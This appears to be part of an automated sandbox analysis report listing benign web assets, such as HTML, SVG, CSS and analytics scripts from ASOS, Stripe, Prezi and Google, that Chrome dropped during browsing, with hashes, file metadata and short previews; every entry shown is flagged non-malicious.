                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (51252), with CRLF, LF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):370205
                                                                                                                                                                                              Entropy (8bit):5.573491112710611
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:153C5DF0683EDDB1A55937C52016EA65
                                                                                                                                                                                              SHA1:2CA29341D8F89DD2F06B5A4C23B2772004C7B001
                                                                                                                                                                                              SHA-256:038C8A58C7C6AFE9972E7D735093DDAD9A8AD9C2429A48D8FE1BDE1C8951B878
                                                                                                                                                                                              SHA-512:248D5E22C35A668D3A5A79FCE365801011EF767290A99AD081AAAAD2099DBBCF30596F42B1ACF7DA5A52157603FAA812038E35A6C526B68B216181E3AAB8CBF3
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:<!DOCTYPE html>. 13.0.0-154f33d1-71--><html lang="en-GB" data-platform="desktop" data-store-code="COM" data-country-code="GB" data-gender="null">. <head><script>!function(i,n){let o=window[i]=window[i]||{};o=o[n]=o[n]||{},o._cookieData={initialLength:document.cookie.length,initialCount:document.cookie.split(";").length}}("asos","siteChrome");.//# sourceMappingURL=https://assets.asosservices.com/sitechromepublisher/cookieScript.8ac7551e.inlined.js.map</script><meta charSet="utf-8"/><title>ASOS | Online Shopping for the Latest Clothes & Fashion</title><meta name="description" content="Discover the latest fashion trends with ASOS. Shop the new collection of clothing, footwear, accessories, beauty products and more. Order today from ASOS."/><meta name="p:domain_verify" content="7d543da16a86f7ad75c452097bfa9e47"/><meta name="msvalidate.01" content="0BC251BA275FCFB5D0505FEBC89F03B6"/><meta property="fb:app_id" content="123073601043263"/><meta name="viewport" content="width=devi
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):774
                                                                                                                                                                                              Entropy (8bit):4.440917145843649
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:40E2167E47CC055845E1E8ECF21070AC
                                                                                                                                                                                              SHA1:FA22F2E65DE3B1DF56D3271B2FB9C3B6B9A5B7DB
                                                                                                                                                                                              SHA-256:901592B708BB50F6DC82DCD9B86DC4BD00D2790B08451FBC987508990C2C29B2
                                                                                                                                                                                              SHA-512:11485D42363D1D2939A1EA6CC4A70077059CEAACC7F7C388FA0B6A7D33F95CD563D7226BD22F9728C305D0DE54934ACDFCA347693113EC75A53A7B13C48568D8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M18 6.5C18 7.88071 16.8807 9 15.5 9C14.9483 9 14.4383 8.8213 14.0249 8.51861L8.99671 11.8707C8.9989 11.9135 9 11.9566 9 12C9 12.0434 8.9989 12.0865 8.99671 12.1293L14.0249 15.4814C14.4383 15.1787 14.9483 15 15.5 15C16.8807 15 18 16.1193 18 17.5C18 18.8807 16.8807 20 15.5 20C14.1193 20 13 18.8807 13 17.5C13 17.4029 13.0055 17.307 13.0163 17.2127L8.09053 13.9289C7.65834 14.2857 7.1042 14.5 6.5 14.5C5.11929 14.5 4 13.3807 4 12C4 10.6193 5.11929 9.5 6.5 9.5C7.1042 9.5 7.65834 9.71434 8.09053 10.0711L13.0163 6.78727C13.0055 6.693 13 6.59715 13 6.5C13 5.11929 14.1193 4 15.5 4C16.8807 4 18 5.11929 18 6.5Z" fill="black"/>.</svg>.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):5194
                                                                                                                                                                                              Entropy (8bit):3.976628767895142
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:63E737D3544164D2B7F4FBCA416AC807
                                                                                                                                                                                              SHA1:030370AA38715E4C41589633F69D0BFE8255D46C
                                                                                                                                                                                              SHA-256:5FA00D047ACD959697B9D7772C31DCD37BEC33C70C6FBF80AB8316205D1D286D
                                                                                                                                                                                              SHA-512:31EE1BB536C0E50F5568A415EA3308367BFCFD11D2A6F7DFF1C8E3A982F7BE790C240A603CD4C6E187672824B8E5D07646049A28C6A88A7B001EB9A0142F312B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:<svg height="16" width="136" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 136 14.6"><defs><clipPath id="a"><path fill="none" d="M53.76 0H136v14.6H53.76z"/></clipPath></defs><path d="M0 12.3V5.59h2.27a2.62 2.62 0 011.29.28 1.83 1.83 0 01.74.77 2.25 2.25 0 01.25 1.07 2.26 2.26 0 01-.25 1.08 1.77 1.77 0 01-.74.77 2.55 2.55 0 01-1.28.29H.66v-.72h1.59a1.81 1.81 0 00.87-.19 1.1 1.1 0 00.48-.5 1.73 1.73 0 00.15-.73A1.66 1.66 0 003.6 7a1.1 1.1 0 00-.48-.5 1.86 1.86 0 00-.88-.18H.81v6zm7.74.1a2.29 2.29 0 01-1.2-.32 2.29 2.29 0 01-.8-.91 3.06 3.06 0 01-.28-1.36 3.07 3.07 0 01.28-1.37 2.14 2.14 0 012-1.24 2.14 2.14 0 012 1.24A3.07 3.07 0 0110 9.81a3.06 3.06 0 01-.29 1.36 2.11 2.11 0 01-2 1.23zm0-.69a1.31 1.31 0 00.85-.27 1.6 1.6 0 00.5-.69 2.9 2.9 0 00.16-.94 2.85 2.85 0 00-.16-.94 1.67 1.67 0 00-.5-.71 1.37 1.37 0 00-.85-.26 1.35 1.35 0 00-.85.26 1.67 1.67 0 00-.5.71 2.85 2.85 0 00-.16.94 2.9 2.9 0 00.16.94 1.6 1.6 0 00.5.69 1.29 1.29 0 00.85.27zm4.43.59l-1.54-5h.82l1.08 3
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (50450)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):50959
                                                                                                                                                                                              Entropy (8bit):5.357310062408202
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:76F55EE255012A4A449F15A401D952A3
                                                                                                                                                                                              SHA1:B02E1D4D68EA9210C715C118F00BFAF22C269CCB
                                                                                                                                                                                              SHA-256:037B8F92A29A18ABEB0DCE30FC8CA5B6DC8BF4220383AF63E013C29F8464339C
                                                                                                                                                                                              SHA-512:3C5CD16543419070AFC29D0998CA0639BDD5517761F148EF6DF981FC131E22333D70FCD5C2269EDE6BBC047BC9C237B1938603AE31FA2DF8DB9E4218E7EF17E7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://creativeassets.asosservices.com/js/cx-nrelic.js
                                                                                                                                                                                              Preview:(function() {. window.cx = window.cx || {};. window.cx.configNewRelic = window.cx.configNewRelic || function(appIdStr) {. ;window.NREUM||(NREUM={});NREUM.init={privacy:{cookies_enabled:true}};.. ;NREUM.loader_config={accountID:"711799",trustKey:"711799",agentID: appIdStr,licenseKey:"3edea625b0",applicationID: appIdStr};. ;NREUM.info={beacon:"bam.nr-data.net",errorBeacon:"bam.nr-data.net",licenseKey:"3edea625b0",applicationID: appIdStr,sa:1};.. (()=>{"use strict";var e,t,r={5763:(e,t,r)=>{r.d(t,{P_:()=>l,Mt:()=>g,C5:()=>s,DL:()=>v,OP:()=>T,lF:()=>D,Yu:()=>y,Dg:()=>h,CX:()=>c,GE:()=>b,sU:()=>_});var n=r(8632),i=r(9567);const o={beacon:n.ce.beacon,errorBeacon:n.ce.errorBeacon,licenseKey:void 0,applicationID:void 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},a={};function s(e){if(!e)throw new Error("All info obj
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (505)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1014
                                                                                                                                                                                              Entropy (8bit):5.28603883072956
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:444D3EBFF59F6874CE16EE02C25C9D40
                                                                                                                                                                                              SHA1:2E1FF4B82E88C1537E1C2DD558FA585A2B72BDD6
                                                                                                                                                                                              SHA-256:810D3D7ED253445CF037E14308A220588E6B3A1B6454992CC15567E62F09B261
                                                                                                                                                                                              SHA-512:A36B3C0308E7FC9D69733AA4994F6A2ACA453D7254A36B7409E5EBB7146F02AD07BBDA0EE31CC12820732A077A596C5B15BF2090ABFE2AF06F6C63051884EF40
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:// HubSpot Script Loader. Please do not block this resource. See more: http://hubs.ly/H0702_H0..!function(e,t){if(!document.getElementById(e)){var c=document.createElement("script");c.src="https://js.hs-analytics.net/analytics/1730910000000/20307117.js",c.type="text/javascript",c.id=e;var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(c,n)}}("hs-analytics");.var _hsp = window._hsp = window._hsp || [];._hsp.push(['addEnabledFeatureGates', []]);._hsp.push(['setBusinessUnitId', 0]);.!function(t,e,r){if(!document.getElementById(t)){var n=document.createElement("script");for(var a in n.src="https://js.hs-banner.com/v2/20307117/banner.js",n.type="text/javascript",n.id=t,r)r.hasOwnProperty(a)&&n.setAttribute(a,r[a]);var i=document.getElementsByTagName("script")[0];i.parentNode.insertBefore(n,i)}}("cookieBanner-20307117",0,{"data-cookieconsent":"ignore","data-hs-ignore":true,"data-loader":"hs-scriptloader","data-hsjs-portal":20307117,"data-hsjs-env":"prod","data-hsjs-hu
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (7783)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2058242
                                                                                                                                                                                              Entropy (8bit):5.176720878309656
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:7B5D62F0A5152AF4CFE08F37DCC3B548
                                                                                                                                                                                              SHA1:88E17B39CCDCA0C0E518472A2D8C5C2F20D343ED
                                                                                                                                                                                              SHA-256:871EF5A67A597430378D9CCD05477FFA8AA35BE7211A4C65A38BC9CC600DA9BF
                                                                                                                                                                                              SHA-512:38E3B75F4539CACDD0CB0964344555CD39A2B3413DD56043E37DCF7A55D7B5B8F740AE3B7D32AFFE48A9971D8049CC537CB3992826024937C54360B664ABAFE2
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html. class="MktRoot". lang="en-US". data-js-controller="Page". data-page-id="Home". data-page-title="Stripe | Financial Infrastructure to Grow Your Revenue". data-loading.>. <head>. <script>window.__capturedErrors = [];.window.onerror = function (message, url, line, column, error) { __capturedErrors.push(error); };.window.onunhandledrejection = function(evt) { __capturedErrors.push(evt.reason); }.</script>.<meta. name="sentry-config". data-js-dsn="https://7cd38b0eb2b348b39a6002cc768f91c7@errors.stripe.com/376". data-js-release="a501ea5bb68bd22c3343358a438f854372ba3a0e". data-js-environment="production". data-js-project="mkt".>.. <meta name="experiment-treatments" content="acquisition_top_cta_change.control.ursula.30b116d1-12b0-4b1e-92f8-5bc394fd9375.a,wpp_homepage_title_copy.control.ursula.db095a98-f576-44eb-95cb-d758134d5ce5.a,acquisition_home_email_input_nav_cta_switch_v2.treatment_2.ursula.b68bed1c-56ae-4cd8-9ec1-e35c283465ab.a,acquisition_jp_home
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (738)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):1404
                                                                                                                                                                                              Entropy (8bit):5.279285019364911
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:D86CE772A6BB358B9987EA88D23B60C8
                                                                                                                                                                                              SHA1:1325F6E39579E11284D520185A891C56B6DC3EA9
                                                                                                                                                                                              SHA-256:38D3C4B3A6A06E51F13533948D0400423C37C53DDA699A697F15542B8F946D7B
                                                                                                                                                                                              SHA-512:C00DB8C439C6C1EC6111A48D6FAFA282C2CE077EDC57056697FEDE0272FBAC97A89C660FD09288216F516B3311FC9E184B9F0456FFCF0BC656238561718FE955
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://assets.asosservices.com/sitechromepublisher/vendors.7066a9f385c04a3ae6f5.css
                                                                                                                                                                                              Preview:/*! license: https://assets.asosservices.com/fonts/futura-pt/LICENSE.txt */@font-face{font-display:swap;font-family:futura-pt;font-style:italic;font-weight:400;src:url(https://assets.asosservices.com/fonts/futura-pt/creative.1fc777b4.woff2) format("woff2")}.FwJXaFp{font-size:18px;letter-spacing:.6px;line-height:24px}.FwJXaFp,.LjNswYi{font-style:italic;font-weight:400}.LjNswYi{font-size:16px;letter-spacing:.4px;line-height:22px}.OHZ3yTe{font-size:14px;letter-spacing:.6px;line-height:20px}.OHZ3yTe,.xREtrYC{font-style:italic;font-weight:400}.xREtrYC{font-size:12px;letter-spacing:.8px;line-height:16px}./*! license: https://assets.asosservices.com/fonts/futura-pt/LICENSE.txt */@font-face{font-display:swap;font-family:futura-pt;font-style:italic;font-weight:700;src:url(https://assets.asosservices.com/fonts/futura-pt/creativeBold.1f9423cd.woff2) format("woff2")}.KKDrHgP{font-size:60px;font-style:italic;font-weight:700;letter-spacing:2px;line-height:60px;text-transform:uppercase}.L5UuMxq{font-
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1579)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):93327
                                                                                                                                                                                              Entropy (8bit):4.752306885655256
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:C372AE057FCEA510EDFA8BD3F91834B6
                                                                                                                                                                                              SHA1:0B993A42E54D3DA829AAEF60EE522A2D5DACD169
                                                                                                                                                                                              SHA-256:8C8626BD50FC9BA25F22DA9DA8148CD3014A3D12C7EED41601322C4279A4BB18
                                                                                                                                                                                              SHA-512:7ABDC74A2C5F8F23A0B79A1D575FE77482B3E56E446DAE787EA33DEF18497DBF52FADC1254F834E5A7388539125C7CA3780AE0CB898C4A8B66CBFB68A0C58E52
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:<!DOCTYPE html><html data-wf-page="66211787b03806cf39c1dffb" data-wf-site="64be3ac6d7e811ba37809e1c" lang="en"><head> OneTrust Cookies Consent Notice start --><script src="https://cdn.cookielaw.org/scripttemplates/otSDKStub.js" data-document-language="true" type="text/javascript" charset="UTF-8" data-domain-script="babb4261-7c8b-4e0d-9b99-ce4e6e126a13"></script><script src="https://package-bundles.prezi.com/cookie-consent/cookie-consent.1.0.6/cookie-consent.js"></script> OneTrust Cookies Consent Notice end --><title>. Presentations and videos with engaging visuals for hybrid teams | Prezi Present. </title><link rel="stylesheet" href="https://assets.prezicdn.net/assets-versioned/coverservice-versioned/4515-1bfba78/CACHE/css/output.5f271655cefb.css" type="text/css"><meta content="Welcome to Prezi, the presentation software that uses motion, zoom, and spatial relationships to bring your ideas to life and make you a great presenter.". name="descriptio
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):149805
                                                                                                                                                                                              Entropy (8bit):5.6004134683803555
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:5693E74A87CDFE0DD8CF9E97ABC2EC67
                                                                                                                                                                                              SHA1:0912A92CEBFC4248B4D561F57B32D18135F9AD59
                                                                                                                                                                                              SHA-256:79951B5BD4D729A2B2F4D380819F2C14BBCF26F21DB56A520189633467766CF4
                                                                                                                                                                                              SHA-512:B0954FF6229C037AAEC67F6CC91889D3AD1C0D38AC3E53E61F3A98D49379FA43C1FF709C7017459B9BD416BCEB2236D90B24C17E072882C122360069DCD9E0E0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:!function(){"use strict";function t(){t=function(){return e};var e={},d=Object.prototype,n=d.hasOwnProperty,r="function"==typeof Symbol?Symbol:{},o=r.iterator||"@@iterator",i=r.asyncIterator||"@@asyncIterator",a=r.toStringTag||"@@toStringTag";function $(t,e,d){return Object.defineProperty(t,e,{value:d,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{$({},"")}catch(t){$=function(t,e,d){return t[e]=d}}function u(t,e,d,n){var r=e&&e.prototype instanceof s?e:s,o=Object.create(r.prototype),i=new w(n||[]);return o._invoke=function(t,e,d){var n="suspendedStart";return function(r,o){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===r)throw o;return E()}for(d.method=r,d.arg=o;;){var i=d.delegate;if(i){var a=_(i,d);if(a){if(a===c)continue;return a}}if("next"===d.method)d.sent=d._sent=d.arg;else if("throw"===d.method){if("suspendedStart"===n)throw n="completed",d.arg;d.dispatchException(d.arg)}else"return"===d.method&&d.abrupt("return",d.arg);
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):7428
                                                                                                                                                                                              Entropy (8bit):5.0085849636844655
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:9795494B11A42D97AE2BA52C36B05927
                                                                                                                                                                                              SHA1:8A3BC204E1E1A460C3E8020FB13C4ECA4A967518
                                                                                                                                                                                              SHA-256:7692E35619EE55066B39325D72273C5E076EFDCA65848966B9D56B957E06F931
                                                                                                                                                                                              SHA-512:837EBCE8B4661BA8F8B9B9763348EBD9087009761573FD10E73E51AA638B655313769733B1D46D4BA1B145515DD6734D114CCB9F28E765D123936E0B38239268
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:"https://c.go-mpulse.net/api/config.json?key=KEKMC-5QPEH-Y5FHE-8AH54-JDSN3&d=www.asos.com&t=5769700&v=1.766.0&sl=0&si=37ed5b82-49f0-4a44-98a6-dfa5d03fcd1c-smjet0&plugins=AK,ConfigOverride,Continuity,PageParams,IFrameDelay,AutoXHR,SPA,History,Angular,Backbone,Ember,RT,CrossDomain,BW,PaintTiming,NavigationTiming,ResourceTiming,Memory,CACHE_RELOAD,Errors,TPAnalytics,UserTiming,Akamai,Early,EventTiming,LOGN&acao=&ak.ai=243464"
                                                                                                                                                                                              Preview:{"h.key":"KEKMC-5QPEH-Y5FHE-8AH54-JDSN3","h.d":"asos.com","h.t":1730910137844,"h.cr":"f82d7df8c29690fdd68a2776e59b30566e44e612-e6f7476a-c58388ad","session_id":"ab397ac4-90a3-4424-98b6-c03b8db5497f","site_domain":"asos.com","beacon_url":"//02179915.akstat.io/","autorun":true,"instrument_xhr":true,"strip_query_string":true,"beacon_interval":60,"BW":{"enabled":false},"RT":{"session_exp":1800},"ResourceTiming":{"enabled":true,"splitAtPath":true},"Continuity":{"enabled":true,"waitAfterOnload":2000},"PageParams":{"xhr":"match","pageGroups":[{"type":"Regexp","parameter1":".*/.*/cat/\\?","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/search($|/|\\?)","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/brand-error/","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/brand-unavailable/","parameter2":"PLP","on":["navigation"]},{"type":"Regexp","parameter1":".*/.*/prd/","parameter2":"PDP","on":["navigation"]},{"type":
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Algol 68 source, ASCII text, with very long lines (2256)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):325377
                                                                                                                                                                                              Entropy (8bit):5.635838536542233
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:4B1F49C5DB609CDCEB86FFFA21202242
                                                                                                                                                                                              SHA1:20DC317CEFD07AFB1EDE44C6BBBF6C5D4E8B0AF5
                                                                                                                                                                                              SHA-256:2F5423F2C6F71CEB4F267C97D96E208F9A00ABBAD7524B3AB5B289FEDF622B7A
                                                                                                                                                                                              SHA-512:1AB2A66C63D9B94F0812CB6E2D7038319E36BF7480C9C7BE81F0D8D338D26217ED2213E7E1A7FEFB1DAEF971F94920D75324D70840BE907548913FE8E6D7E061
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:(function(){var root=this;var previousUnderscore=root._;var breaker={};var ArrayProto=Array.prototype,ObjProto=Object.prototype,FuncProto=Function.prototype;var.push=ArrayProto.push,slice=ArrayProto.slice,concat=ArrayProto.concat,toString=ObjProto.toString,hasOwnProperty=ObjProto.hasOwnProperty;var.nativeForEach=ArrayProto.forEach,nativeMap=ArrayProto.map,nativeReduce=ArrayProto.reduce,nativeReduceRight=ArrayProto.reduceRight,nativeFilter=ArrayProto.filter,nativeEvery=ArrayProto.every,nativeSome=ArrayProto.some,nativeIndexOf=ArrayProto.indexOf,nativeLastIndexOf=ArrayProto.lastIndexOf,nativeIsArray=Array.isArray,nativeKeys=Object.keys,nativeBind=FuncProto.bind;var _=function(obj){if(obj instanceof _)return obj;if(!(this instanceof _))return new _(obj);this._wrapped=obj;};if(typeof exports!=='undefined'){if(typeof module!=='undefined'&&module.exports){exports=module.exports=_;}.exports._=_;}else{root._=_;}._.VERSION='1.6.0';var each=_.each=_.forEach=function(obj,iterator,context){if(obj=
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):295269
                                                                                                                                                                                              Entropy (8bit):5.287607195979462
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:ABDBABD2F2E147F7C92858569FC95BE9
                                                                                                                                                                                              SHA1:1D981E9CC072BC9D0F6091DED25D4C9BCCD7535A
                                                                                                                                                                                              SHA-256:C337D001B48BCC81F20ABA396A11C291491ED9DB78845E9F98D07985379E1CB9
                                                                                                                                                                                              SHA-512:80C1EA0B58CE9DCB284FF8D6A4C6B6AF510AF77A787DFF07E2B3D23BBDA6D09CE6754DBD6F3D10E84223B73E4552D0C4547DE89CB6DD591FD87CAEA7E9D8B3F5
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://www.asos.com/assets/uilib/content-ui-library-5.0.0-c2f7f9fe-40.css
                                                                                                                                                                                              Preview:.videoClickToPlay-controlsWrapper .videoClickToPlay-controls__toggle--fullScreen{background-image:url("data:image/svg+xml;charset%3DUS-ASCII,%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3Csvg%20width%3D%2240px%22%20height%3D%2240px%22%20viewBox%3D%220%200%2040%2040%22%20version%3D%221.1%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%3E%20%20%20%20%20%20%20%20%3Ctitle%3Eicon_full_screen%3C%2Ftitle%3E%20%20%20%20%3Cdesc%3ECreated%20with%20Sketch.%3C%2Fdesc%3E%20%20%20%20%3Cdefs%3E%3C%2Fdefs%3E%20%20%20%20%3Cg%20id%3D%22Spec---updates-based-on-dev-feedback%22%20stroke%3D%22none%22%20stroke-width%3D%221%22%20fill%3D%22none%22%20fill-rule%3D%22evenodd%22%3E%20%20%20%20%20%20%20%20%3Cg%20id%3D%22Video-Click-to-play%22%20transform%3D%22translate%28-759.000000%2C%20-6143.000000%29%22%3E%20%20%20%20%20%20%20%20%20%20%20%20%3Cg%20id%3D%22icon_full_screen%22%20transform%3D%22translate%28755.000000%2C%206139.
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (533), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):533
                                                                                                                                                                                              Entropy (8bit):4.933115570682282
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:FEB698008C36A09DFE88AB06A1C3E3B9
                                                                                                                                                                                              SHA1:A871FBCBBE298AE7078D06627708B2C106A0FAF3
                                                                                                                                                                                              SHA-256:1C4E7E389D73C6ACF7F19CC812514E71230740791FDE8A018C1D7EDCCF1590AE
                                                                                                                                                                                              SHA-512:F8E3CA3E49B1C027232D1B3AAB82B5430F4A69334A5E18BEB4469C39D6A24D3F4D3FA4C473F360B619CE734977F0D7EFD03BE6ACB5EB7B9F69295FB2CBF94D9B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              URL:https://accounts.google.com/gsi/style
                                                                                                                                                                                              Preview:#credential_picker_container{border:none;height:330px;position:fixed;right:20px;top:20px;width:391px;z-index:9999}#credential_picker_container iframe{border:none;width:391px;height:330px}#g_a11y_announcement{height:1px;left:-10000px;overflow:hidden;position:absolute;top:auto;width:1px}.L5Fo6c-sM5MNb{border:0;display:block;left:0;position:relative;top:0}.L5Fo6c-bF1uUb{-webkit-border-radius:4px;border-radius:4px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0}.L5Fo6c-bF1uUb:focus{border:none;outline:none}sentinel{}
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (51785)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):472523
                                                                                                                                                                                              Entropy (8bit):5.613225960980579
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:F79B93E422A6CE16D6B58794D8EC8787
                                                                                                                                                                                              SHA1:97C267F905049141C0C004C208FD95487A27FD7E
                                                                                                                                                                                              SHA-256:4D77226A39FC0FB548FFB6511185240D33B4C8B7C6132A6006983DD487C0BF35
                                                                                                                                                                                              SHA-512:18FA81A691890C95586ABFE99F04AB98BE10C41C70DDE5A9552B50C7B63E7A726C56849621CFDCBEDD223E170F3C8ACDBED1F99A698B21C24264D7D7C9744DA5
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"1048",. . "macros":[{"function":"__e"},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__j","vtp_name":"document.title"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"quantity"},{"function":"__jsm","vtp_javascript":["template","(function(){return 600*",["escape",["macro",5],8,16],"})();"]},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDef
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65529), with no line terminators
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):88751
                                                                                                                                                                                              Entropy (8bit):5.414296471740167
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                              MD5:69CB7809B5011312E716F29B3D19DCE6
                                                                                                                                                                                              SHA1:833DABFB546D57065AEBA7190B5EE5A2428DFA47
                                                                                                                                                                                              SHA-256:E039E607C78306C7E029A7FD0ECDB14F86456F16E1A5CE65AA26B4FDF1D38A3C
